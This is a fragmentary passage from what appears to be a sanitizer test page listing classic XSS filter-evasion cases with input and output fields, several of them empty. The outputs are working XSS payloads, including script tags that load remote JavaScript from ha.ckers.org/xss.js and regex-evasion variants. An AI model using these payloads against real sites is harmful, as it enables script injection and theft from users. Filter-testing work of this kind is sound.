Output code »
49. Hex Encoding w/out Semicolons
Input code »
Output code »
50. Embedded Tab
Input code »
Output code »
51. Embedded Encoded Tab
Input code »
Output code »
52. Embedded Newline
Input code »
Output code »
53. Embedded Carriage Return
Input code »
Output code »
54. Multiline w/Carriage Returns
Input code »
Output code »
55. Spaces/Meta Chars
Input code »
Output code »
56. Non-Alpha/Non-Digit
Input code »
Output code »
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
57. Non-Alpha/Non-Digit Part 2
Input code »
Output code »
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
58. No Closing Script Tag
Input code »
Output code »
<<SCRIPT>alert("XSS");//<</SCRIPT>
63. Malformed IMG Tags
Input code »
">
Output code »
<SCRIPT>alert("XSS")</SCRIPT>">
64. No Quotes/Semicolons
Input code »
Output code »
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
65. Evade Regex Filter 1
Input code »
Output code »
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
66. Evade Regex Filter 2
Input code »
Output code »
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
67. Evade Regex Filter 3
Input code »
Output code »
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
68. Evade Regex Filter 4
Input code »
Output code »
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
69. Evade Regex Filter 5
Input code »
Output code »
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
70. Filter Evasion 1
Input code »
PT SRC="http://ha.ckers.org/xss.js">
Output code »
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
71. Filter Evasion 2
Input code »
Output code »
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
72. Mixed Encoding
Input code »
XSS
Output code »
XSS
73. JavaScript Link Location
Input code »
XSS
Output code »
XSS